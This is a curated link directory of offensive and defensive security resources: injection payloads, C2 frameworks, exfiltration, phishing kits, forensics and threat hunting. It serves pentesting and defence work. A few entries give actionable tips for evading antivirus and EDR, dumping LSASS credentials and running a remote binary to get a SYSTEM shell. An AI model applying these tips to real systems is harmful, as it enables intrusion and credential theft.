Blind SQL Injection Detection and Exploitation (Cheat Sheet)
SQLMap Cheat Sheet:
SQL injection : Improper handling of input during SQL query generation
An investigation into SQL Injection tools — The pattern of each attack tool Part II
Advanced SQL Injection

CSIRT / Pentesting / Payloads / CSRF:

DNS Hijacking Attacks on Home Routers in Brazil
CSRF Injection 61,337 9 days ago
Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections

CSIRT / Pentesting / Payloads / HTTP Request Smuggling:

HRS - HTTP Request Smuggling Attack. What, Why and How.
Practical Attacks Using HTTP Request Smuggling
HAProxy HTTP request smuggling (CVE-2019-18277)
The Powerful HTTP Request Smuggling
Smuggler 13 about 2 years ago : An HTTP Request Smuggling / Desync testing tool written in Python 3
HTTP.Request.Smuggling.Desync.Attack 14 over 3 years ago : HTTP request smuggling is a technique for interfering with the way a website processes the sequence of HTTP requests it receives from one or more users
h2c Smuggling : Request Smuggling Via HTTP/2 Cleartext (h2c)
HTTP Request Smuggler 958 11 months ago : This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research
Advanced request smuggling

CSIRT / Pentesting / Payloads / XSS:

Cross-site scripting (XSS) cheat sheet
Reflected XSS on www.hackerone.com via Wistia embed code
xss cheatsheet 5,938 about 1 year ago
Cross Site Scripting ( XSS ) Vulnerability Payload List 6,366 4 months ago
an XSS payload, Cuneiform-alphabet based

CSIRT / Pentesting / Payloads

Security impact of a misconfigured CORS implementation
Which Security Risks Do CORS Imply?
Cross-Origin Resource Sharing (CORS)
How to win at CORS
CORS'ing a Denial of Service via cache poisoning
SSRF Search & Destroy :
SSRF 5,938 about 1 year ago
SSRF Tips : some tips with Server Side Request Forgery
Server Side Request Forgery on MISP : CVE-2020-28043
SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
Unauthenticated Full-Read SSRF in Grafana : CVE-2020-13379
Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
Gf-Patterns 1,216 2 months ago : GF Patterns for grepping (ssrf, RCE, LFI, sqli, ssti, idor, url redirection, debug_logic, interesting subs) parameters
Blind SSRF Chains by
lorsrf 289 2 months ago : Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods
Out of Band XXE in an E-commerce IOS app by
Comprehensive Guide on XXE Injection
XMLDecoder payload generator 149 almost 4 years ago : A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec
Enjoying my first blind xxe experience
XXE 5,938 about 1 year ago
dtd-finder 610 9 months ago : List DTDs and generate XXE payloads using those local DTDs
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
XXE_payloads
Advanced XXE Exploitation
Planilhas Baby : ssrf + ssti + xxe
ysoserial 7,789 8 months ago : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization
SerialVersionUID in Java
Java Serialization Magic Methods And Their Uses With Example
Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020-9484) : java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
CVE-2020-9484-Mass-Scan 32 over 4 years ago
Exploiting JNDI Injections in Java
How to exploit Liferay CVE-2020-7961 : quick journey to PoC
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
Serialization: the big threat
marshalsec 3,403 almost 2 years ago : Turning your data into code execution
SerializationDumper 989 5 months ago : A tool to dump Java serialization streams in a more human readable form
owaspsd-deserialize-my-shorts 5 over 8 years ago : Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
Deserialization
FAR SIDES OF JAVA REMOTE PROTOCOLS
Serialization and deserialization in Java: explaining the Java deserialize vulnerability
Testing and exploiting Java Deserialization in 2021
Queries and Mutations
GraphQL Injection 61,337 9 days ago
GraphQL : Common vulnerabilities & how to exploit them. : Represent any GraphQL API as an interactive graph
GraphQLmap 1,390 9 months ago : is a scripting engine to interact with a graphql endpoint for pentesting purposes

CSIRT / Pentesting / Payloads / RPC:

Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
ProtoFuzz 272 over 1 year ago : Google Protocol Buffers message generator
pbtk - Reverse engineering Protobuf apps 1,414 about 1 month ago : A toolset for reverse engineering and fuzzing Protobuf-based apps
Online Protobuf Decoder.

CSIRT / Pentesting / Payloads

Burp Suite Cheat Sheet
Burp Suite Academy

CSIRT / Pentesting / Payloads / REST Assured: Penetration Testing REST APIs Using Burp Suite:

Part 1 – Introduction & Configuration
Part 2 – Testing
Part 3 – Reporting

CSIRT / Pentesting / Payloads

Awesome Burp Extensions 3,001 5 days ago : A curated list of amazingly awesome Burp Extensions
BurpSuiteHTTPSmuggler 709 over 5 years ago : A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
AutoRepeater 846 almost 3 years ago : Automated HTTP Request Repeating With Burp Suite
privatecollaborator 205 5 months ago : A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
Deploying a private Burp Collaborator server
Burp Collaborator Server docker container with LetsEncrypt certificate 280 4 months ago : This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server
SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT : The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data
AES-Killer v3.0 : Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
Femida-xss 277 about 5 years ago : Automated blind-xss search for Burp Suite
dotNetBeautifier 12 over 9 years ago : A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE)
Java-Deserialization-Scanner 775 about 3 years ago : All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities
JavaSerialKiller 208 10 months ago : Burp extension to perform Java Deserialization Attacks
BurpBounty 1,680 7 months ago : Burp Bounty (Scan Check Builder in BApp Store) is an extension of Burp Suite that improves an active and passiv
How to install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
BurpExtension-WhatsApp-Decryption-CheckPoint 637 about 5 years ago
InQL 1,540 5 months ago : A Burp Extension for GraphQL Security Testing
param-miner 1,245 9 days ago
PII-Identifier 21 almost 4 years ago : Burp Extension to identify PII data
403Bypasser 1,567 over 1 year ago : Burp Suite extension to bypass 403 restricted directories
API testing with Swurg for Burp Suite
Burp Bounty tip : create a Passive Profile for a param value, like testsqli, and then create a Rule with this Profile to trigger the SQLi active profile
Handling Short Expiration Time of Authorization Tokens
BurpSuite-Team-Extension 252 about 2 years ago : This Burp Suite plugin allows multiple web app testers to share their proxy history with each other in real time. Requests that come through your Burp Suite instance will be replicated in the history of the other testers and vice-versa!
ActiveScan++ 208 12 months ago : ActiveScan++ Burp Suite Plugin

CSIRT / Pentesting / Red Team

Awesome Red Teaming 6,917 11 months ago
DumpsterFire 996 over 4 years ago : "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts
Machine Learning for Red Teams, Part 1
Flying under the radar : Hack into a "highly protected" company without getting caught
demiguise 1,371 about 2 years ago : HTA encryption tool for RedTeams
Sn1per 8,120 about 1 month ago : Automated pentest framework for offensive security experts
jenkins-shell 94 over 6 years ago : Automating Jenkins Hacking using Shodan API
Red Team's SIEM 2,383 2 months ago : easily deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long-term operations
The-Hacker-Playbook-3-Translation 2,289 over 4 years ago : Chinese translation of The Hacker Playbook 3.
How Do I Prepare to Join a Red Team?
Red Team & Physical Entry Gear
Red Team Techniques : Gaining access on an external engagement through spear-phishing
Phantom Tap (PhanTap) 582 6 months ago : an ‘invisible’ network tap aimed at red teams
So You Want to Run a Red Team Operation : I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization
Alternative C2 for Red Teamers : Koadic C3 COM Command & Control - JScript RAT
tuning tip : if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
In-Memory-Only ELF Execution (Without tmpfs) : In which we run a normal ELF binary on Linux without touching the filesystem (except /proc)
A Red Teamer's guide to pivoting
caldera 5,653 21 days ago : Automated Adversary Emulation
BankSecurity - Red_Team 1,551 almost 3 years ago : Some scripts useful for red team activities
FIN6 Adversary Emulation 1,723 11 months ago
Red-Teaming-Toolkit 9,098 3 months ago : A collection of open source and commercial tools that aid in red team operations
RedFile 18 over 2 years ago : A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
Choose Your Own Red Team Adventure
Red Tip #415 : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use "smbpasswd -r domain.fqdn -U username" to change the password so you can use the account
Red Team Tactics: Hiding Windows Services
AQUARMOURY : This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
Prelude Operator : is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming
0xsp Mongoose Red for Windows 530 over 2 years ago : a unique framework for cybersecurity simulation and red teaming operations, Windows auditing for newer vulnerabilities, misconfigurations and privilege escalation attacks; replicates the tactics and techniques of an advanced adversary in a network
Macrome 513 almost 3 years ago : Excel Macro Document Reader/Writer for Red Teamers & Analysts
FireEye Red Team Tool Countermeasures 2,650 9 months ago and
wifipumpkin3 1,982 11 months ago : Powerful framework for rogue access point attack
The worst of the two worlds: Excel meets Outlook
redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness 252 5 months ago
pivoting cheat sheet
Self-hosting Your Red Team Payloads : Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV
Boomerang 216 almost 4 years ago is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks
Mythic 3,263 6 days ago : A collaborative, multi-platform, red teaming framework
Alan Framework 462 10 months ago : A post-exploitation framework
Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
Red Teaming/Adversary Simulation Toolkit
Wiki to collect Red Team infrastructure hardening resources 4,149 8 months ago
Red Team development and operations : A practical guide to red team operations, written by Joe Vest and James Tubberville
VECTR 1,393 2 months ago is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
Mortar Loader 1,410 11 months ago : evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
RedTeam-Tools 6,004 over 1 year ago : Tools and Techniques for Red Team / Penetration Testing
Cobalt Strike : is software for Adversary Simulations and Red Team Operations. 4.2
CrossC2 2,283 about 1 year ago : generate CobaltStrike's cross-platform payload
Cobalt-Strike-CheatSheet 986 almost 3 years ago : Some notes and examples for cobalt strike's functionality
Introducing
Octopus 730 over 3 years ago : Open source pre-operation C2 server based on python and powershell
Covenant 4,197 4 months ago : Covenant is a collaborative .NET C2 framework for red teamers
Building C2 Implants in C++: A Primer
tc2 26 almost 4 years ago : Traefik-fronted C2 examples
ToRat 977 over 1 year ago : is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication
Python Backdoor Talking to a C2 Through Ngrok
Sliver 8,536 10 days ago : Implant framework
PoshC2 1,820 about 1 month ago : is a proxy-aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement
pyMalleableC2 267 24 days ago : Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically
link 563 over 3 years ago : is a command and control framework written in Rust
Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
Third step in setting up C2 environment. Using socat as front to Merlin. Command and control my way.
Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
melting-cobalt 164 about 2 years ago : A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object
Beacon generation for attacks targeting iOS : command & control on iOS

CSIRT / Pentesting / Purple Team

Purple Cloud 525 10 days ago : An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On
PRO TIP when looking through logs on Windows : use WEVTUTIL.exe

CSIRT / DNS

Plight At The End Of The Tunnel
dref 481 over 3 years ago : DNS Rebinding Exploitation Framework
dns-rebind-toolkit 485 about 3 years ago : A front-end JavaScript toolkit for creating DNS rebinding attacks
Bypass firewalls by abusing DNS history 1,197 about 2 years ago : Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bug bounty hunters
dnstwist 4,912 about 2 months ago : Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
Can I take over XYZ? 4,867 6 days ago : a list of services and how to claim (sub)domains with dangling DNS records
SubR3con 18 over 5 years ago : is a script written in Python. It uses Sublist3r to enumerate all subdomains of a specific target and then checks the status code for possible subdomain takeover vulnerabilities. This works great with Subover.go
TakeOver-v1 101 over 1 year ago : script extracts the CNAME record of all subdomains at once. TakeOver saves researcher time and increases the chance of finding a subdomain takeover vulnerability
subzy 1,063 2 months ago : Subdomain takeover vulnerability checker
Subdomain Takeover Scanner 57 over 1 year ago
subdomain-takeover 353 over 1 year ago : SubDomain TakeOver Scanner by 0x94
DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven't been tampered with.
pdns-qof 36 3 months ago : Passive DNS Common Output Format
dnsdbq 94 14 days ago : DNSDB API Client, C Version

CSIRT / DNS / DNS Logging:

How to enable bind query logging to find out Who’s Querying a Name Server
BIND Logging - some basic recommendations
BIND 9 logging best practices
BIND9 Configuration Guide
Thwarting and detecting malware with RPZ and OSSEC
The Importance of DNS Logging in Enterprise Security

CSIRT / DNS

DNSObserver 188 about 4 years ago : A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack
Unbound DNS Blacklist
subjack 1,911 over 1 year ago : Subdomain Takeover tool written in Go
SAD DNS : The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq)
dog 6,179 6 months ago : Command-line DNS client
NtHiM 355 over 1 year ago : Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection!
DNS loophole makes nation-state level spying as easy as registering a domain

CSIRT / Exfiltration

Script for searching the extracted firmware file system for goodies! 1,057 about 1 year ago
DKMC - Dont kill my cat 1,377 over 4 years ago : Malicious payload evasion tool
Tunna 1,241 about 2 years ago is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments
gitleaks 17,964 17 days ago : Searches full repo history for secrets and keys
Twitter Scraper 3,936 about 1 year ago
tinfoleak : The most complete open-source tool for Twitter intelligence analysis
Social IDs 12 almost 8 years ago : Get user ids from social network handlers
SpookFlare 946 over 5 years ago : Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures
Photon 11,067 3 months ago : Incredibly fast crawler which extracts urls, emails, files, website accounts and much more
Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
accountanalysis : This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often
How to get authentication key from SNMPv3 packets
AtomicTestsCommandLines.txt : Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
whois | GTFOBins : hangs waiting for the remote peer to close the socket. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
ssh-keygen can be used to load shared libraries
Browsers affected by the History API DoS
PacketWhisper : Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server
Using Google Analytics for data extraction
Exfiltrating credentials via PAM backdoors & DNS requests
Building simple DNS endpoints for exfiltration or C&C
CheckPlease 898 over 3 years ago : Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust
okhttp-peer-certificate-extractor 79 over 8 years ago : This tool extracts peer certificates from given certificates
DET 820 about 7 years ago : (extensible) Data Exfiltration Toolkit (DET)
awesome-python-login-model 15,938 over 2 years ago : login access for web scraping
Hamburglar 316 almost 2 years ago : collect useful information from urls, directories, and files
Giggity 126 over 1 year ago : grab hierarchical data about a github organization, user, or repo
Living Off The Land Binaries and Scripts (and also Libraries) -
Windows TCPIP Finger Command : C2 Channel and Bypassing Security Software
Living Off Windows Land – A New Native File “downldr”
Ttdinject.exe : Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Exfiltrate Like a Pro : Using DNS over HTTPS as a C2 Channel
Awesome Asset Discovery 1,990 6 months ago : List of Awesome Asset Discovery Resources
Cloakify-Factory : A data exfiltration tool using text-based steganography. Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
hakrawler 4,502 10 months ago : Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
Chameleon 459 about 2 years ago : A tool for evading Proxy categorisation
DNSExfiltrator 847 7 months ago : Data exfiltration over DNS request covert channel
Data Exfiltration using Linux Binaries
Desperate downloader MSOXMLED.EXE -

CSIRT / Exfiltration / LOLBIN/LOLBAS:

Exploring the WDAC Microsoft Recommended Block Rules: kill.exe . lolbin/lolbas
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= lolbin/lolbas
C:\Windows\System32\Cmdl32.exe
I shot the sigverif.exe – the GUI-based LOLBin
\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe
Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?
C:\Windows\System32\WorkFolders.exe
C:\Windows\System32\certoc.exe -LoadDLL
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio*" folder, you can bypass Defender and dump LSASS.

CSIRT / Exfiltration

Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
Living off the land
It's not a forgotten legacy code, it's recidivism : tpmtool drivetracing
Python Keylogger Using Mailtrap.io

CSIRT / Exfiltration / Steganography

A list of useful tools and resources
steghide 593 9 months ago : is a steganography program that is able to hide data in various kinds of image- and audio-files
stegsolve 650 over 3 years ago
Unicode Text Steganography Encoders/Decoders
StegCracker 554 almost 4 years ago : Steganography brute-force utility to uncover hidden data inside files
Simple Image Steganography in Python
How To Hide Data in Images Using Python
Aperi'Solve is an online platform which performs layer analysis on images. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis
Stegseek 1,034 about 1 year ago : World's fastest steghide cracker, chewing through millions of passwords per second

CSIRT / Phishing

Phishing on Twitter 251 over 6 years ago
evilginx2 10,924 3 months ago : Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
shellphish : Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
pompa 49 11 months ago : Fully-featured spear-phishing toolkit - web front-end
Modlishka 4,847 7 months ago : Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side)
Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign
Lure 158 over 1 year ago : User Recon Automation for GoPhish
PhishingKitTracker : An extensible and freshly updated collection of phishing kits for forensics and future analysis, topped with simple stats
SimplyTemplate 162 almost 7 years ago : Phishing Template Generation Made Easy
Compromising operating systems through fake software updates. Using : is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates
MurmurHash 114 about 1 year ago : This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform
SniperPhish 540 7 months ago : The Web-Email Spear Phishing Toolkit
King Phisher 2,269 4 months ago : Phishing Campaign Toolkit
phishing-frenzy 794 about 1 year ago : Ruby on Rails Phishing Framework
gophish 11,675 2 months ago :
Phishing 101: why depend on one suspicious message subject when you can use many?
Widespread credential phishing campaign abuses open redirector links
ThePhish 1,154 4 months ago : an automated phishing email analysis tool

CSIRT / Forensics

Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
O-Saft 373 4 days ago : OWASP SSL advanced forensic tool
PcapXray 1,698 over 2 years ago A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
swap_digger 513 over 3 years ago is a tool used to automate Linux swap analysis during post-exploitation or forensics
The Sleuth Kit® (TSK) 2,630 7 days ago is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
Invoke-LiveResponse 145 almost 3 years ago
Linux Forensics
CDQR 334 over 2 years ago : The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
mac_apt 781 about 1 month ago : macOS Artifact Parsing Tool
MacForensics 179 4 months ago : Repository of scripts for processing various artifacts from macOS (formerly OSX)
imago-forensics 249 almost 3 years ago : Imago is a Python tool that extracts digital evidence from images
remedi-infrastructure 4 almost 6 years ago : setup and deployment code for setting up a REMEDI machine translation cluster
Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
libelfmaster 410 16 days ago : Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
usbrip 1,154 about 2 years ago (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines
Digital Forensics and Incident Response : This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response
KAPE (Kroll Artifact Parser And Extractor) : Find, collect and process forensically useful artifacts in minutes
AVML 875 9 days ago (Acquire Volatile Memory for Linux)
turbinia 750 6 days ago : Automation and Scaling of Digital Forensics Tools
Eric Zimmerman's Tools
MacQuisition : A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging
Kuiper 769 about 1 month ago : Digital Forensics Investigation Platform
File Signatures :
PowerForensics 1,385 about 1 year ago : PowerForensics provides an all in one platform for live disk forensic analysis
OfficeForensicTools 26 over 4 years ago : A set of tools for collecting forensic information
FBI Electronic Tip For
CHIRP 1,043 over 3 years ago : A forensic collection tool written in Python
Hash Cracking with AWS and hashcat
Hashcat new feature: autodetect hash-mode
L0phtCrack is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables
Foremost 317 over 1 year ago : is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
TrID : is a utility designed to identify file types from their binary signatures. While there are similar utilities with hard-coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way
image-unshredding 607 about 8 years ago : Image unshredding using a TSP solver
Linux Incident Response Guide
FastIR Artifacts 160 5 months ago : Live forensic artifacts collector
MVT 10,416 21 days ago (Mobile Verification Toolkit) helps conduct forensics of mobile devices in order to find signs of a potential compromise
Cloud Forensics Triage Framework (CFTF)
Forensic Investigation Cisco Stealthwatch at work
Andriller CE (Community Edition) 1,343 over 2 years ago : is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices
Dshell 5,454 7 months ago is a network forensic analysis framework
exif-gps-tracer 41 almost 4 years ago : A Python script which allows you to parse GeoLocation data from your image files stored in a dataset. It produces output as a CSV file and as an HTML Google Maps page

CSIRT / Forensics / Anti-Forensics:

ShredOS x86_64 - Disk Eraser 1,506 2 months ago : for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe

CSIRT / Forensics

dfir_ntfs 191 15 days ago : An NTFS/FAT parser for digital forensics & incident response
MemProcFS 3,115 7 days ago : is an easy and convenient way of viewing physical memory as files in a virtual file system
LeechCore 522 about 1 month ago : Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent
PCILeech 5,011 12 days ago : Direct Memory Access (DMA) Attack Software

CSIRT / Forensics / PDF

PDF Tools
peepdf 1,309 3 months ago : Powerful Python tool to analyze PDF documents
How to Protect Files With Canary Tokens
Attacks on PDF Certification
How to remove malicious code from PDF files
mu tools
PDF forensics with Kali Linux : pdfid and pdfparser
How can I extract a JavaScript from a PDF file with a command line tool?
Insecure Features in PDFs.
Shadow Attacks … the smallest attack vector ever

CSIRT / Forensics / Email Headers

Configuring MTA-STS and TLS Reporting For Your Domain
Google Admin Toolbox
Azure Message Header Analyzer

CSIRT / Forensics / Distros

CAINE : Computer Aided INvestigative Environment. It is an Italian GNU/Linux live distribution created as a Digital Forensics project
e-Fense Helix 3
BlackArch : An ArchLinux based distribution for penetration testers and security researchers
List of Live Distributions for Computer Forensics

CSIRT / Forensics / Volatility

volatility 7,343 over 1 year ago : An advanced memory forensics framework
Volatility profiles for Linux and Mac OS X 318 about 2 years ago
Building a profile for Volatility
OROCHI 225 7 days ago : The Volatility Collaborative GUI
AutoVolatility 108 about 2 years ago : Run several volatility plugins at the same time
Memory Forensics and Analysis Using Volatility
Volatility, my own cheatsheet (Part 1): Image Identification
First steps to volatile memory analysis
MemLabs 1,659 over 3 years ago : Educational, CTF-styled labs for individuals interested in Memory Forensics

CSIRT / Blue Team / MITRE ATT&CK:

ATTACK-Tools 1,012 6 months ago : Utilities for MITRE™ ATT&CK
Analyzing threats with Mitre ATT&CK Navigator (pt-br)
ATT&CK™ Navigator : Web app that provides basic navigation and annotation of ATT&CK matrices
Atomic Threat Coverage 972 over 2 years ago : Actionable analytics designed to combat threats based on MITRE's ATT&CK
atomic-red-team 9,782 9 days ago : Small and highly portable detection tests based on MITRE's ATT&CK
Welcome to Stealthbits Attack Catalog : Adversary techniques for credential theft and data compromise
Splunk Attack Range 2,154 16 days ago : A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk
attack-scripts 581 12 months ago : Scripts and a (future) library to improve users' interactions with the ATT&CK content
Windows-specific MITRE ATT&CK techniques application control prevention assessment. This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications
Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
EU MITRE ATT&CK® Community
Mitre Att&ck Matri 18 over 3 years ago
Best Practices for MITRE ATT&CK® Mapping

CSIRT / Blue Team

MITRE D3FEND
DeTTECT 2,066 15 days ago : Detect Tactics, Techniques & Combat Threats

CSIRT / Blue Team / Sysmon:

Profile Sysmon logs to discover which LOLBAS binaries have run and what their command line arguments were
Sysmon 12.0 — EventID 24 : is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring
SysmonX 210 about 5 years ago : An Augmented Drop-In Replacement of Sysmon
SysmonSimulator 833 almost 3 years ago : Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams

CSIRT / Blue Team

Awesome Honeypots 8,661 3 months ago : A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects
T-Pot 6,855 8 days ago : The All In One Honeypot Platform 
Blue Team Fundamentals
Blue Team fundamentals Part Two : Windows Processes
Sooty 1,352 about 2 months ago : The SOC Analyst's all-in-one CLI tool to automate and speed up workflow
Your detections aren't working
elastalert 7,997 4 months ago : Easy & Flexible Alerting With ElasticSearch
Technical Approaches to Uncovering and Remediating Malicious Activity : Alert (AA20-245A)
EVTX-ATTACK-SAMPLES 2,248 almost 2 years ago : Windows Events Attack Samples
Windows Advanced Audit Policy Map to Event IDs
takuan 84 over 3 years ago is a system service that parses logs and detects noisy attackers in order to build a blacklist database of known cyber offenders
CobaltStrikeScan 900 over 3 years ago : Scan files or process memory for CobaltStrike beacons and parse their configuration
Hunting and detecting Cobalt Strike
Cobalt Strike Beacon Analysis . python decoder:
How to Design Detection Logic - Part 1
Mitigating Pass-the-Hash and Other Credential Theft
Evilginx-ing into the cloud: How we detected a red team attack in AWS
Hidden Shares as bait
Blue Team 201: Detection — Where Do You Start?
The DML model
hashlookup CIRCL API
BaselineTraining 12 over 5 years ago : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk
Practical Training for Blue Teamers
BLUE TEAM LABS ONLINE
Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.

CSIRT / Blue Team / Threat Hunting

Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
Cisco Talos Blog : Adwind Dodges AV via DDE
strelka 882 about 1 month ago : Scanning files at scale with Python and ZeroMQ
Threat-Hunting 255 almost 6 years ago : Personal compilation of APT malware from whitepaper releases, documents and own research
ThreatHunter-Playbook 4,025 9 months ago : A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns
